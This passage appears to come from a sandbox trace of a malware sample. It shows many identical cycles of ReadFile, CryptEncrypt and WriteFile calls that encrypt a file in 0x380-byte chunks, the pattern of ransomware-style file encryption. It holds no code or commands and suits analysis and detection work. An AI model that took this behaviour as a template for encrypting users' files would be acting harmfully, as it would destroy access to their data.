dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.774] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.774] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.774] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.774] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.774] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.774] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.774] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.774] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.774] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.774] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.775] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.775] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.775] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.775] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.775] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.775] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.775] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.775] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.775] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.775] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.775] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.775] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.775] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.776] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.776] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.776] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.776] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.776] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.776] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.776] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.776] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.776] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.776] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.776] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.776] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.776] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.776] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.776] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.777] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.777] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.777] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.777] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.777] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.777] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.777] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.777] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.777] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.777] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.777] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.777] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.777] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.777] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.778] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.778] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.778] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.778] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.778] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.778] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.778] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.778] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.778] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.778] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.778] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.778] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.778] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.779] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.779] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.779] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.779] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.779] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.779] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.779] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.779] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.779] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.779] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.779] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.779] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.779] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.779] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.780] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.780] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.780] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.780] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.780] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.780] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.780] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.780] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.780] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.780] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.780] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.780] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.780] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.781] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.781] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.781] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.781] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.781] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.781] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.781] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.781] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.781] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.781] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.781] WriteFile (in: 